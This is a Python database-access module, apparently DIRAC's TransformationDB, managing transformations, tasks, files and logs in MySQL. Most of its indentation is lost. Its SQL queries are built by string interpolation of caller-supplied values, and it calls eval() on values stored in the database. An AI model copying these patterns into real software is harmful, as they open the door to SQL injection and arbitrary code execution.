def getTransformationParameters( self, transName, parameters, connection = False ):
""" Get the requested parameters for a supplied transformation """
if type( parameters ) in StringTypes:
parameters = [parameters]
extraParams = False
for param in parameters:
if not param in self.TRANSPARAMS:
extraParams = True
res = self.getTransformation( transName, extraParams = extraParams, connection = connection )
if not res['OK']:
return res
transParams = res['Value']
paramDict = {}
for reqParam in parameters:
if not reqParam in transParams.keys():
return S_ERROR( "Parameter %s not defined for transformation" % reqParam )
paramDict[reqParam] = transParams[reqParam]
if len( paramDict ) == 1:
return S_OK( paramDict[reqParam] )
return S_OK( paramDict )
def getTransformationWithStatus( self, status, connection = False ):
""" Gets a list of the transformations with the supplied status """
req = "SELECT TransformationID FROM Transformations WHERE Status = '%s';" % status
res = self._query( req, conn = connection )
if not res['OK']:
return res
transIDs = []
for tupleIn in res['Value']:
transIDs.append( tupleIn[0] )
return S_OK( transIDs )
def getTableDistinctAttributeValues( self, table, attributes, selectDict, older = None, newer = None,
timeStamp = None, connection = False ):
tableFields = { 'Transformations' : self.TRANSPARAMS,
'TransformationTasks' : self.TASKSPARAMS,
'TransformationFiles' : self.TRANSFILEPARAMS}
possibleFields = tableFields.get( table, [] )
return self.__getTableDistinctAttributeValues( table, possibleFields, attributes, selectDict, older, newer,
timeStamp, connection = connection )
def __getTableDistinctAttributeValues( self, table, possible, attributes, selectDict, older, newer,
timeStamp, connection = False ):
connection = self.__getConnection( connection )
attributeValues = {}
for attribute in attributes:
if possible and ( not attribute in possible ):
return S_ERROR( 'Requested attribute (%s) does not exist in table %s' % ( attribute, table ) )
res = self.getDistinctAttributeValues( table, attribute, condDict = selectDict, older = older, newer = newer,
timeStamp = timeStamp, connection = connection )
if not res['OK']:
return S_ERROR( 'Failed to serve values for attribute %s in table %s' % ( attribute, table ) )
attributeValues[attribute] = res['Value']
return S_OK( attributeValues )
def __updateTransformationParameter( self, transID, paramName, paramValue, connection = False ):
if not ( paramName in self.mutable ):
return S_ERROR( "Can not update the '%s' transformation parameter" % paramName )
if paramName == 'Body':
res = self._escapeString( paramValue )
if not res['OK']:
return S_ERROR( "Failed to parse parameter value" )
paramValue = res['Value']
req = "UPDATE Transformations SET %s=%s, LastUpdate=UTC_TIMESTAMP() WHERE TransformationID=%d" % ( paramName,
paramValue,
transID )
return self._update( req, connection )
req = "UPDATE Transformations SET %s='%s', LastUpdate=UTC_TIMESTAMP() WHERE TransformationID=%d" % ( paramName,
paramValue,
transID )
return self._update( req, connection )
def _getTransformationID( self, transName, connection = False ):
""" Method returns ID of transformation with the name=<name> """
try:
transName = long( transName )
cmd = "SELECT TransformationID from Transformations WHERE TransformationID=%d;" % transName
except:
if type( transName ) not in StringTypes:
return S_ERROR( "Transformation should ID or name" )
cmd = "SELECT TransformationID from Transformations WHERE TransformationName='%s';" % transName
res = self._query( cmd, connection )
if not res['OK']:
gLogger.error( "Failed to obtain transformation ID for transformation", "%s:%s" % ( transName, res['Message'] ) )
return res
elif not res['Value']:
gLogger.verbose( "Transformation %s does not exist" % ( transName ) )
return S_ERROR( "Transformation does not exist" )
return S_OK( res['Value'][0][0] )
def __deleteTransformation( self, transID, connection = False ):
req = "DELETE FROM Transformations WHERE TransformationID=%d;" % transID
return self._update( req, connection )
def __updateFilters( self, connection = False ):
""" Get filters for all defined input streams in all the transformations.
If transID argument is given, get filters only for this transformation.
"""
resultList = []
# Define the general filter first
self.database_name = self.__class__.__name__
value = Operations().getValue( 'InputDataFilter/%sFilter' % self.database_name, '' )
if value:
refilter = re.compile( value )
resultList.append( ( 0, refilter ) )
# Per transformation filters
req = "SELECT TransformationID,FileMask FROM Transformations;"
res = self._query( req, connection )
if not res['OK']:
return res
for transID, mask in res['Value']:
if mask:
refilter = re.compile( mask )
resultList.append( ( transID, refilter ) )
self.filters = resultList
return S_OK( resultList )
def __filterFile( self, lfn, filters = None ):
"""Pass the input file through a supplied filter or those currently active """
result = []
if filters:
for transID, refilter in filters:
if refilter.search( lfn ):
result.append( transID )
else:
for transID, refilter in self.filters:
if refilter.search( lfn ):
result.append( transID )
return result
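  # Sketch (values are hypothetical): with ( 7, re.compile( '/lhcb/MC/.*\.dst' ) ) among the
  # active filters, __filterFile( '/lhcb/MC/2012/some_file.dst' ) would return [7].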
###########################################################################
#
# These methods manipulate the AdditionalParameters tables
#
def setTransformationParameter( self, transName, paramName, paramValue, author = '', connection = False ):
""" Add a parameter for the supplied transformations """
res = self._getConnectionTransID( connection, transName )
if not res['OK']:
return res
connection = res['Value']['Connection']
transID = res['Value']['TransformationID']
message = ''
if paramName in self.TRANSPARAMS:
res = self.__updateTransformationParameter( transID, paramName, paramValue, connection = connection )
if res['OK']:
pv = self._escapeString( paramValue )
if not pv['OK']:
return S_ERROR( "Failed to parse parameter value" )
paramValue = pv['Value']
message = '%s updated to %s' % ( paramName, paramValue )
else:
res = self.__addAdditionalTransformationParameter( transID, paramName, paramValue, connection = connection )
if res['OK']:
message = 'Added additional parameter %s' % paramName
if message:
self.__updateTransformationLogging( transID, message, author, connection = connection )
return res
def getAdditionalParameters( self, transName, connection = False ):
res = self._getConnectionTransID( connection, transName )
if not res['OK']:
return res
connection = res['Value']['Connection']
transID = res['Value']['TransformationID']
return self.__getAdditionalParameters( transID, connection = connection )
def deleteTransformationParameter( self, transName, paramName, author = '', connection = False ):
""" Delete a parameter from the additional parameters table """
res = self._getConnectionTransID( connection, transName )
if not res['OK']:
return res
connection = res['Value']['Connection']
transID = res['Value']['TransformationID']
if paramName in self.TRANSPARAMS:
return S_ERROR( "Can not delete core transformation parameter" )
res = self.__deleteTransformationParameters( transID, parameters = [paramName], connection = connection )
if not res['OK']:
return res
self.__updateTransformationLogging( transID, 'Removed additional parameter %s' % paramName, author,
connection = connection )
return res
def __addAdditionalTransformationParameter( self, transID, paramName, paramValue, connection = False ):
req = "DELETE FROM AdditionalParameters WHERE TransformationID=%d AND ParameterName='%s'" % ( transID, paramName )
res = self._update( req, connection )
if not res['OK']:
return res
res = self._escapeString( paramValue )
if not res['OK']:
return S_ERROR( "Failed to parse parameter value" )
paramValue = res['Value']
paramType = 'StringType'
if type( paramValue ) in [IntType, LongType]:
paramType = 'IntType'
req = "INSERT INTO AdditionalParameters (%s) VALUES (%s,'%s',%s,'%s');" % ( ', '.join( self.ADDITIONALPARAMETERS ),
transID, paramName,
paramValue, paramType )
return self._update( req, connection )
def __getAdditionalParameters( self, transID, connection = False ):
req = "SELECT %s FROM AdditionalParameters WHERE TransformationID = %d" % ( ', '.join( self.ADDITIONALPARAMETERS ),
transID )
res = self._query( req, connection )
if not res['OK']:
return res
paramDict = {}
for transID, parameterName, parameterValue, parameterType in res['Value']:
parameterType = eval( parameterType )
if parameterType in [IntType, LongType]:
parameterValue = int( parameterValue )
paramDict[parameterName] = parameterValue
return S_OK( paramDict )
def __deleteTransformationParameters( self, transID, parameters = [], connection = False ):
""" Remove the parameters associated to a transformation """
req = "DELETE FROM AdditionalParameters WHERE TransformationID=%d" % transID
if parameters:
req = "%s AND ParameterName IN (%s);" % ( req, stringListToString( parameters ) )
return self._update( req, connection )
###########################################################################
#
# These methods manipulate the TransformationFiles table
#
def addFilesToTransformation( self, transName, lfns, connection = False ):
""" Add a list of LFNs to the transformation directly """
if not lfns:
return S_ERROR( 'Zero length LFN list' )
res = self._getConnectionTransID( connection, transName )
if not res['OK']:
return res
connection = res['Value']['Connection']
transID = res['Value']['TransformationID']
res = self.__getFileIDsForLfns( lfns, connection = connection )
if not res['OK']:
return res
fileIDs, _lfnFilesIDs = res['Value']
failed = {}
successful = {}
missing = []
fileIDsValues = set( fileIDs.values() )
for lfn in lfns:
if lfn not in fileIDsValues:
missing.append( lfn )
if missing:
res = self.__addDataFiles( missing, connection = connection )
if not res['OK']:
return res
for lfn, fileID in res['Value'].items():
fileIDs[fileID] = lfn
# must update the fileIDs
if fileIDs:
res = self.__addFilesToTransformation( transID, fileIDs.keys(), connection = connection )
if not res['OK']:
return res
for fileID in fileIDs.keys():
lfn = fileIDs[fileID]
successful[lfn] = "Present"
if fileID in res['Value']:
successful[lfn] = "Added"
resDict = {'Successful':successful, 'Failed':failed}
return S_OK( resDict )
def getTransformationFiles( self, condDict = {}, older = None, newer = None, timeStamp = 'LastUpdate',
orderAttribute = None, limit = None, offset = None, connection = False ):
""" Get files for the supplied transformations with support for the web standard structure """
connection = self.__getConnection( connection )
req = "SELECT %s FROM TransformationFiles" % ( intListToString( self.TRANSFILEPARAMS ) )
originalFileIDs = {}
if condDict or older or newer:
if condDict.has_key( 'LFN' ):
lfns = condDict.pop( 'LFN' )
if type( lfns ) in StringTypes:
lfns = [lfns]
res = self.__getFileIDsForLfns( lfns, connection = connection )
if not res['OK']:
return res
originalFileIDs, _ignore = res['Value']
condDict['FileID'] = originalFileIDs.keys()
for val in condDict.itervalues():
if not val:
return S_OK( [] )
req = "%s %s" % ( req, self.buildCondition( condDict, older, newer, timeStamp, orderAttribute, limit,
offset = offset ) )
res = self._query( req, connection )
if not res['OK']:
return res
transFiles = res['Value']
fileIDs = [int( row[1] ) for row in transFiles]
webList = []
resultList = []
if not fileIDs:
originalFileIDs = {}
else:
if not originalFileIDs:
res = self.__getLfnsForFileIDs( fileIDs, connection = connection )
if not res['OK']:
return res
originalFileIDs = res['Value'][1]
for row in transFiles:
lfn = originalFileIDs[row[1]]
# Prepare the structure for the web
rList = [lfn]
fDict = {}
fDict['LFN'] = lfn
count = 0
for item in row:
fDict[self.TRANSFILEPARAMS[count]] = item
count += 1
if type( item ) not in [IntType, LongType]:
rList.append( str( item ) )
else:
rList.append( item )
webList.append( rList )
resultList.append( fDict )
result = S_OK( resultList )
# result['LFNs'] = originalFileIDs.values()
result['Records'] = webList
result['ParameterNames'] = ['LFN'] + self.TRANSFILEPARAMS
return result
def getFileSummary( self, lfns, connection = False ):
""" Get file status summary in all the transformations """
connection = self.__getConnection( connection )
condDict = {'LFN':lfns}
res = self.getTransformationFiles( condDict = condDict, connection = connection )
if not res['OK']:
return res
resDict = {}
for fileDict in res['Value']:
lfn = fileDict['LFN']
transID = fileDict['TransformationID']
if not resDict.has_key( lfn ):
resDict[lfn] = {}
if not resDict[lfn].has_key( transID ):
resDict[lfn][transID] = {}
resDict[lfn][transID] = fileDict
failedDict = {}
for lfn in lfns:
if not resDict.has_key( lfn ):
failedDict[lfn] = 'Did not exist in the Transformation database'
return S_OK( {'Successful':resDict, 'Failed':failedDict} )
def setFileStatusForTransformation( self, transID, fileStatusDict = {}, connection = False ):
""" Set file status for the given transformation, based on
fileStatusDict {fileID_A: 'statusA', fileID_B: 'statusB', ...}
The ErrorCount is incremented automatically here
"""
if not fileStatusDict:
return S_OK()
# Building the request with "ON DUPLICATE KEY UPDATE"
req = "INSERT INTO TransformationFiles (TransformationID, FileID, Status, ErrorCount, LastUpdate) VALUES "
updatesList = []
for fileID, status in fileStatusDict.items():
updatesList.append( "(%d, %d, '%s', 0, UTC_TIMESTAMP())" % ( transID, fileID, status ) )
req += ','.join( updatesList )
req += " ON DUPLICATE KEY UPDATE Status=VALUES(Status),ErrorCount=ErrorCount+1,LastUpdate=VALUES(LastUpdate)"
return self._update( req, connection )
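  # Illustrative only (instance name and IDs are hypothetical): statuses are keyed by FileID
  # and applied in a single multi-row INSERT ... ON DUPLICATE KEY UPDATE, e.g.
  #   transDB.setFileStatusForTransformation( 42, {1001: 'Processed', 1002: 'Problematic'} )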
def getTransformationStats( self, transName, connection = False ):
""" Get number of files in Transformation Table for each status """
res = self._getConnectionTransID( connection, transName )
if not res['OK']:
return res
connection = res['Value']['Connection']
transID = res['Value']['TransformationID']
res = self.getCounters( 'TransformationFiles', ['TransformationID', 'Status'], {'TransformationID':transID} )
if not res['OK']:
return res
statusDict = {}
total = 0
for attrDict, count in res['Value']:
status = attrDict['Status']
if not re.search( '-', status ):
statusDict[status] = count
total += count
statusDict['Total'] = total
return S_OK( statusDict )
def getTransformationFilesCount( self, transName, field, selection = {}, connection = False ):
""" Get the number of files in the TransformationFiles table grouped by the supplied field """
res = self._getConnectionTransID( connection, transName )
if not res['OK']:
return res
connection = res['Value']['Connection']
transID = res['Value']['TransformationID']
selection['TransformationID'] = transID
if field not in self.TRANSFILEPARAMS:
return S_ERROR( "Supplied field not in TransformationFiles table" )
res = self.getCounters( 'TransformationFiles', ['TransformationID', field], selection )
if not res['OK']:
return res
countDict = {}
total = 0
for attrDict, count in res['Value']:
countDict[attrDict[field]] = count
total += count
countDict['Total'] = total
return S_OK( countDict )
def __addFilesToTransformation( self, transID, fileIDs, connection = False ):
req = "SELECT FileID from TransformationFiles"
req = req + " WHERE TransformationID = %d AND FileID IN (%s);" % ( transID, intListToString( fileIDs ) )
res = self._query( req, connection )
if not res['OK']:
return res
for tupleIn in res['Value']:
fileIDs.remove( tupleIn[0] )
if not fileIDs:
return S_OK( [] )
req = "INSERT INTO TransformationFiles (TransformationID,FileID,LastUpdate,InsertedTime) VALUES"
for fileID in fileIDs:
req = "%s (%d,%d,UTC_TIMESTAMP(),UTC_TIMESTAMP())," % ( req, transID, fileID )
req = req.rstrip( ',' )
res = self._update( req, connection )
if not res['OK']:
return res
return S_OK( fileIDs )
def __addExistingFiles( self, transID, connection = False ):
""" Add files that already exist in the DataFiles table to the transformation specified by the transID
"""
    filters = []
    for tID, _filter in self.filters:
      if tID == transID:
        filters = [( tID, _filter )]
        break
if not filters:
return S_ERROR( 'No filters defined for transformation %d' % transID )
res = self.__getAllFileIDs( connection = connection )
if not res['OK']:
return res
fileIDs, _lfnFilesIDs = res['Value']
passFilter = []
for fileID, lfn in fileIDs.items():
if self.__filterFile( lfn, filters ):
passFilter.append( fileID )
return self.__addFilesToTransformation( transID, passFilter, connection = connection )
def __insertExistingTransformationFiles( self, transID, fileTuplesList, connection = False ):
""" Inserting already transformation files in TransformationFiles table (e.g. for deriving transformations)
"""
gLogger.info( "Inserting %d files in TransformationFiles" % len( fileTuplesList ) )
# splitting in various chunks, in case it is too big
for fileTuples in breakListIntoChunks( fileTuplesList, 10000 ):
gLogger.verbose( "Adding first %d files in TransformationFiles (out of %d)" % ( len( fileTuples ),
len( fileTuplesList ) ) )
req = "INSERT INTO TransformationFiles (TransformationID,Status,TaskID,FileID,TargetSE,UsedSE,LastUpdate) VALUES"
candidates = False
for ft in fileTuples:
_lfn, originalID, fileID, status, taskID, targetSE, usedSE, _errorCount, _lastUpdate, _insertTime = ft[:10]
if status not in ( 'Unused', 'Removed' ):
candidates = True
if not re.search( '-', status ):
status = "%s-inherited" % status
if taskID:
taskID = str( int( originalID ) ).zfill( 8 ) + '_' + str( int( taskID ) ).zfill( 8 )
req = "%s (%d,'%s','%s',%d,'%s','%s',UTC_TIMESTAMP())," % ( req, transID, status, taskID,
fileID, targetSE, usedSE )
if not candidates:
continue
req = req.rstrip( "," )
res = self._update( req, connection )
if not res['OK']:
return res
return S_OK()
def __assignTransformationFile( self, transID, taskID, se, fileIDs, connection = False ):
""" Make necessary updates to the TransformationFiles table for the newly created task
"""
req = "UPDATE TransformationFiles SET TaskID='%d',UsedSE='%s',Status='Assigned',LastUpdate=UTC_TIMESTAMP()"
req = ( req + " WHERE TransformationID = %d AND FileID IN (%s);" ) % ( taskID, se, transID, intListToString( fileIDs ) )
res = self._update( req, connection )
if not res['OK']:
gLogger.error( "Failed to assign file to task", res['Message'] )
fileTuples = []
for fileID in fileIDs:
fileTuples.append( ( "(%d,%d,%d)" % ( transID, fileID, taskID ) ) )
req = "INSERT INTO TransformationFileTasks (TransformationID,FileID,TaskID) VALUES %s" % ','.join( fileTuples )
res = self._update( req, connection )
if not res['OK']:
gLogger.error( "Failed to assign file to task", res['Message'] )
return res
def __setTransformationFileStatus( self, fileIDs, status, connection = False ):
req = "UPDATE TransformationFiles SET Status = '%s' WHERE FileID IN (%s);" % ( status, intListToString( fileIDs ) )
res = self._update( req, connection )
if not res['OK']:
gLogger.error( "Failed to update file status", res['Message'] )
return res
def __setTransformationFileUsedSE( self, fileIDs, usedSE, connection = False ):
req = "UPDATE TransformationFiles SET UsedSE = '%s' WHERE FileID IN (%s);" % ( usedSE, intListToString( fileIDs ) )
res = self._update( req, connection )
if not res['OK']:
gLogger.error( "Failed to update file usedSE", res['Message'] )
return res
def __resetTransformationFile( self, transID, taskID, connection = False ):
req = "UPDATE TransformationFiles SET TaskID=NULL, UsedSE='Unknown', Status='Unused'\
WHERE TransformationID = %d AND TaskID=%d;" % ( transID, taskID )
res = self._update( req, connection )
if not res['OK']:
gLogger.error( "Failed to reset transformation file", res['Message'] )
return res
def __deleteTransformationFiles( self, transID, connection = False ):
""" Remove the files associated to a transformation """
req = "DELETE FROM TransformationFiles WHERE TransformationID = %d;" % transID
res = self._update( req, connection )
if not res['OK']:
gLogger.error( "Failed to delete transformation files", res['Message'] )
return res
###########################################################################
#
# These methods manipulate the TransformationFileTasks table
#
def __deleteTransformationFileTask( self, transID, taskID, connection = False ):
''' Delete the file associated to a given task of a given transformation
from the TransformationFileTasks table for transformation with TransformationID and TaskID
'''
req = "DELETE FROM TransformationFileTasks WHERE TransformationID=%d AND TaskID=%d" % ( transID, taskID )
return self._update( req, connection )
def __deleteTransformationFileTasks( self, transID, connection = False ):
''' Remove all associations between files, tasks and a transformation '''
req = "DELETE FROM TransformationFileTasks WHERE TransformationID = %d;" % transID
res = self._update( req, connection )
if not res['OK']:
gLogger.error( "Failed to delete transformation files/task history", res['Message'] )
return res
###########################################################################
#
# These methods manipulate the TransformationTasks table
#
def getTransformationTasks( self, condDict = {}, older = None, newer = None, timeStamp = 'CreationTime',
orderAttribute = None, limit = None, inputVector = False,
offset = None, connection = False ):
connection = self.__getConnection( connection )
req = "SELECT %s FROM TransformationTasks %s" % ( intListToString( self.TASKSPARAMS ),
self.buildCondition( condDict, older, newer, timeStamp,
orderAttribute, limit, offset = offset ) )
res = self._query( req, connection )
if not res['OK']:
return res
webList = []
resultList = []
for row in res['Value']:
# Prepare the structure for the web
rList = []
taskDict = {}
count = 0
for item in row:
taskDict[self.TASKSPARAMS[count]] = item
count += 1
if type( item ) not in [IntType, LongType]:
rList.append( str( item ) )
else:
rList.append( item )
webList.append( rList )
if inputVector:
taskDict['InputVector'] = ''
taskID = taskDict['TaskID']
transID = taskDict['TransformationID']
res = self.getTaskInputVector( transID, taskID )
if res['OK']:
if res['Value'].has_key( taskID ):
taskDict['InputVector'] = res['Value'][taskID]
resultList.append( taskDict )
result = S_OK( resultList )
result['Records'] = webList
result['ParameterNames'] = self.TASKSPARAMS
return result
def getTasksForSubmission( self, transName, numTasks = 1, site = '', statusList = ['Created'],
older = None, newer = None, connection = False ):
""" Select tasks with the given status (and site) for submission """
res = self._getConnectionTransID( connection, transName )
if not res['OK']:
return res
connection = res['Value']['Connection']
transID = res['Value']['TransformationID']
condDict = {"TransformationID":transID}
if statusList:
condDict["ExternalStatus"] = statusList
if site:
numTasks = 0
res = self.getTransformationTasks( condDict = condDict, older = older, newer = newer,
timeStamp = 'CreationTime', orderAttribute = None, limit = numTasks,
inputVector = True, connection = connection )
if not res['OK']:
return res
tasks = res['Value']
# Now prepare the tasks
resultDict = {}
for taskDict in tasks:
if len( resultDict ) >= numTasks:
break
taskDict['Status'] = taskDict.pop( 'ExternalStatus' )
taskDict['InputData'] = taskDict.pop( 'InputVector' )
taskDict.pop( 'LastUpdateTime' )
taskDict.pop( 'CreationTime' )
taskDict.pop( 'ExternalID' )
taskID = taskDict['TaskID']
resultDict[taskID] = taskDict
if site:
resultDict[taskID]['Site'] = site
return S_OK( resultDict )
def deleteTasks( self, transName, taskIDbottom, taskIDtop, author = '', connection = False ):
""" Delete tasks with taskID range in transformation """
res = self._getConnectionTransID( connection, transName )
if not res['OK']:
return res
connection = res['Value']['Connection']
transID = res['Value']['TransformationID']
for taskID in range( taskIDbottom, taskIDtop + 1 ):
res = self.__removeTransformationTask( transID, taskID, connection = connection )
if not res['OK']:
return res
message = "Deleted tasks from %d to %d" % ( taskIDbottom, taskIDtop )
self.__updateTransformationLogging( transID, message, author, connection = connection )
return res
def reserveTask( self, transName, taskID, connection = False ):
""" Reserve the taskID from transformation for submission """
res = self._getConnectionTransID( connection, transName )
if not res['OK']:
return res
connection = res['Value']['Connection']
transID = res['Value']['TransformationID']
res = self.__checkUpdate( "TransformationTasks", "ExternalStatus", "Reserved", {"TransformationID":transID,
"TaskID":taskID},
connection = connection )
if not res['OK']:
return res
if not res['Value']:
return S_ERROR( 'Failed to set Reserved status for job %d - already Reserved' % int( taskID ) )
# The job is reserved, update the time stamp
res = self.setTaskStatus( transID, taskID, 'Reserved', connection = connection )
if not res['OK']:
return S_ERROR( 'Failed to set Reserved status for job %d - failed to update the time stamp' % int( taskID ) )
return S_OK()
def setTaskStatusAndWmsID( self, transName, taskID, status, taskWmsID, connection = False ):
""" Set status and ExternalID for job with taskID in production with transformationID
"""
res = self._getConnectionTransID( connection, transName )
if not res['OK']:
return res
connection = res['Value']['Connection']
transID = res['Value']['TransformationID']
res = self.__setTaskParameterValue( transID, taskID, 'ExternalStatus', status, connection = connection )
if not res['OK']:
return res
return self.__setTaskParameterValue( transID, taskID, 'ExternalID', taskWmsID, connection = connection )
def setTaskStatus( self, transName, taskID, status, connection = False ):
""" Set status for job with taskID in production with transformationID """
res = self._getConnectionTransID( connection, transName )
if not res['OK']:
return res
connection = res['Value']['Connection']
transID = res['Value']['TransformationID']
if type( taskID ) != ListType:
taskIDList = [taskID]
else:
taskIDList = list( taskID )
for taskID in taskIDList:
res = self.__setTaskParameterValue( transID, taskID, 'ExternalStatus', status, connection = connection )
if not res['OK']:
return res
return S_OK()
def getTransformationTaskStats( self, transName = '', connection = False ):
""" Returns dictionary with number of jobs per status for the given production.
"""
connection = self.__getConnection( connection )
if transName:
res = self._getTransformationID( transName, connection = connection )
if not res['OK']:
gLogger.error( "Failed to get ID for transformation", res['Message'] )
return res
res = self.getCounters( 'TransformationTasks', ['ExternalStatus'], {'TransformationID':res['Value']},
connection = connection )
else:
res = self.getCounters( 'TransformationTasks', ['ExternalStatus', 'TransformationID'], {},
connection = connection )
if not res['OK']:
return res
statusDict = {}
total = 0
for attrDict, count in res['Value']:
status = attrDict['ExternalStatus']
statusDict[status] = count
total += count
statusDict['TotalCreated'] = total
return S_OK( statusDict )
def __setTaskParameterValue( self, transID, taskID, paramName, paramValue, connection = False ):
req = "UPDATE TransformationTasks SET %s='%s', LastUpdateTime=UTC_TIMESTAMP()" % ( paramName, paramValue )
req = req + " WHERE TransformationID=%d AND TaskID=%d;" % ( transID, taskID )
return self._update( req, connection )
def __deleteTransformationTasks( self, transID, connection = False ):
""" Delete all the tasks from the TransformationTasks table for transformation with TransformationID
"""
req = "DELETE FROM TransformationTasks WHERE TransformationID=%d" % transID
return self._update( req, connection )
def __deleteTransformationTask( self, transID, taskID, connection = False ):
""" Delete the task from the TransformationTasks table for transformation with TransformationID
"""
req = "DELETE FROM TransformationTasks WHERE TransformationID=%d AND TaskID=%d" % ( transID, taskID )
return self._update( req, connection )
####################################################################
#
# These methods manipulate the TransformationInputDataQuery table
#
def createTransformationInputDataQuery( self, transName, queryDict, author = '', connection = False ):
res = self._getConnectionTransID( connection, transName )
if not res['OK']:
return res
connection = res['Value']['Connection']
transID = res['Value']['TransformationID']
return self.__addInputDataQuery( transID, queryDict, author = author, connection = connection )
def __addInputDataQuery( self, transID, queryDict, author = '', connection = False ):
res = self.getTransformationInputDataQuery( transID, connection = connection )
if res['OK']:
return S_ERROR( "Input data query already exists for transformation" )
if res['Message'] != 'No InputDataQuery found for transformation':
return res
for parameterName in sorted( queryDict.keys() ):
parameterValue = queryDict[parameterName]
if not parameterValue:
continue
parameterType = 'String'
if type( parameterValue ) in [ListType, TupleType]:
if type( parameterValue[0] ) in [IntType, LongType]:
parameterType = 'Integer'
parameterValue = [str( x ) for x in parameterValue]
parameterValue = ';;;'.join( parameterValue )
else:
if type( parameterValue ) in [IntType, LongType]:
parameterType = 'Integer'
parameterValue = str( parameterValue )
if type( parameterValue ) == DictType:
parameterType = 'Dict'
parameterValue = str( parameterValue )
res = self.insertFields( 'TransformationInputDataQuery', ['TransformationID', 'ParameterName',
'ParameterValue', 'ParameterType'],
[transID, parameterName, parameterValue, parameterType], conn = connection )
if not res['OK']:
message = 'Failed to add input data query'
self.deleteTransformationInputDataQuery( transID, connection = connection )
break
else:
message = 'Added input data query'
self.__updateTransformationLogging( transID, message, author, connection = connection )
return res
def deleteTransformationInputDataQuery( self, transName, author = '', connection = False ):
res = self._getConnectionTransID( connection, transName )
if not res['OK']:
return res
connection = res['Value']['Connection']
transID = res['Value']['TransformationID']
req = "DELETE FROM TransformationInputDataQuery WHERE TransformationID=%d;" % transID
res = self._update( req, connection )
if not res['OK']:
return res
if res['Value']:
# Add information to the transformation logging
message = 'Deleted input data query'
self.__updateTransformationLogging( transID, message, author, connection = connection )
return res
def getTransformationInputDataQuery( self, transName, connection = False ):
res = self._getConnectionTransID( connection, transName )
if not res['OK']:
return res
connection = res['Value']['Connection']
transID = res['Value']['TransformationID']
req = "SELECT ParameterName,ParameterValue,ParameterType FROM TransformationInputDataQuery"
req = req + " WHERE TransformationID=%d;" % transID
res = self._query( req, connection )
if not res['OK']:
return res
queryDict = {}
for parameterName, parameterValue, parameterType in res['Value']:
if re.search( ';;;', str( parameterValue ) ):
parameterValue = parameterValue.split( ';;;' )
if parameterType == 'Integer':
parameterValue = [int( x ) for x in parameterValue]
elif parameterType == 'Integer':
parameterValue = int( parameterValue )
elif parameterType == 'Dict':
parameterValue = eval( parameterValue )
queryDict[parameterName] = parameterValue
if not queryDict:
return S_ERROR( "No InputDataQuery found for transformation" )
return S_OK( queryDict )
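  # Note: list-valued parameters are stored as a single ';;;'-joined string by
  # __addInputDataQuery and split back into a list (of ints for 'Integer' type) here.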
###########################################################################
#
# These methods manipulate the TaskInputs table
#
def getTaskInputVector( self, transName, taskID, connection = False ):
""" Get input vector for the given task """
res = self._getConnectionTransID( connection, transName )
if not res['OK']:
return res
connection = res['Value']['Connection']
transID = res['Value']['TransformationID']
if type( taskID ) != ListType:
taskIDList = [taskID]
else:
taskIDList = list( taskID )
taskString = ','.join( ["'" + str( x ) + "'" for x in taskIDList] )
req = "SELECT TaskID,InputVector FROM TaskInputs WHERE TaskID in (%s) AND TransformationID='%d';" % ( taskString,
transID )
res = self._query( req )
inputVectorDict = {}
if res['OK'] and res['Value']:
for row in res['Value']:
inputVectorDict[row[0]] = row[1]
return S_OK( inputVectorDict )
def __insertTaskInputs( self, transID, taskID, lfns, connection = False ):
vector = str.join( ';', lfns )
fields = ['TransformationID', 'TaskID', 'InputVector']
values = [transID, taskID, vector]
res = self.insertFields( 'TaskInputs', fields, values, connection )
if not res['OK']:
gLogger.error( "Failed to add input vector to task %d" % taskID )
return res
def __deleteTransformationTaskInputs( self, transID, taskID = 0, connection = False ):
""" Delete all the tasks inputs from the TaskInputs table for transformation with TransformationID
"""
req = "DELETE FROM TaskInputs WHERE TransformationID=%d" % transID
if taskID:
req = "%s AND TaskID=%d" % ( req, int( taskID ) )
return self._update( req, connection )
###########################################################################
#
# These methods manipulate the TransformationLog table
#
def __updateTransformationLogging( self, transName, message, authorDN, connection = False ):
""" Update the Transformation log table with any modifications
"""
if not authorDN:
res = getProxyInfo( False, False )
if res['OK']:
authorDN = res['Value']['subject']
res = self._getConnectionTransID( connection, transName )
if not res['OK']:
return res
connection = res['Value']['Connection']
transID = res['Value']['TransformationID']
req = "INSERT INTO TransformationLog (TransformationID,Message,Author,MessageDate)"
req = req + " VALUES (%s,'%s','%s',UTC_TIMESTAMP());" % ( transID, message, authorDN )
return self._update( req, connection )
def getTransformationLogging( self, transName, connection = False ):
""" Get logging info from the TransformationLog table
"""
res = self._getConnectionTransID( connection, transName )
if not res['OK']:
return res
connection = res['Value']['Connection']
transID = res['Value']['TransformationID']
req = "SELECT TransformationID, Message, Author, MessageDate FROM TransformationLog"
req = req + " WHERE TransformationID=%s ORDER BY MessageDate;" % ( transID )
res = self._query( req )
if not res['OK']:
return res
transList = []
for transID, message, authorDN, messageDate in res['Value']:
transDict = {}
transDict['TransformationID'] = transID
transDict['Message'] = message
transDict['AuthorDN'] = authorDN
transDict['MessageDate'] = messageDate
transList.append( transDict )
return S_OK( transList )
def __deleteTransformationLog( self, transID, connection = False ):
""" Remove the entries in the transformation log for a transformation
"""
req = "DELETE FROM TransformationLog WHERE TransformationID=%d;" % transID
return self._update( req, connection )
###########################################################################
#
# These methods manipulate the DataFiles table
#
def __getAllFileIDs( self, connection = False ):
""" Get all the fileIDs for the supplied list of lfns
"""
req = "SELECT LFN,FileID FROM DataFiles;"
res = self._query( req, connection )
if not res['OK']:
return res
fids = {}
lfns = {}
for lfn, fileID in res['Value']:
fids[fileID] = lfn
lfns[lfn] = fileID
return S_OK( ( fids, lfns ) )
def __getFileIDsForLfns( self, lfns, connection = False ):
""" Get file IDs for the given list of lfns
warning: if the file is not present, we'll see no errors
"""
req = "SELECT LFN,FileID FROM DataFiles WHERE LFN in (%s);" % ( stringListToString( lfns ) )
res = self._query( req, connection )
if not res['OK']:
return res
fids = {}
lfns = {}
for lfn, fileID in res['Value']:
fids[fileID] = lfn
lfns[lfn] = fileID
return S_OK( ( fids, lfns ) )
def __getLfnsForFileIDs( self, fileIDs, connection = False ):
""" Get lfns for the given list of fileIDs
"""
req = "SELECT LFN,FileID FROM DataFiles WHERE FileID in (%s);" % stringListToString( fileIDs )
res = self._query( req, connection )
if not res['OK']:
return res
fids = {}
lfns = {}
for lfn, fileID in res['Value']:
fids[lfn] = fileID
lfns[fileID] = lfn
return S_OK( ( fids, lfns ) )
def __addDataFiles( self, lfns, connection = False ):
""" Add a file to the DataFiles table and retrieve the FileIDs
"""
res = self.__getFileIDsForLfns( lfns, connection = connection )
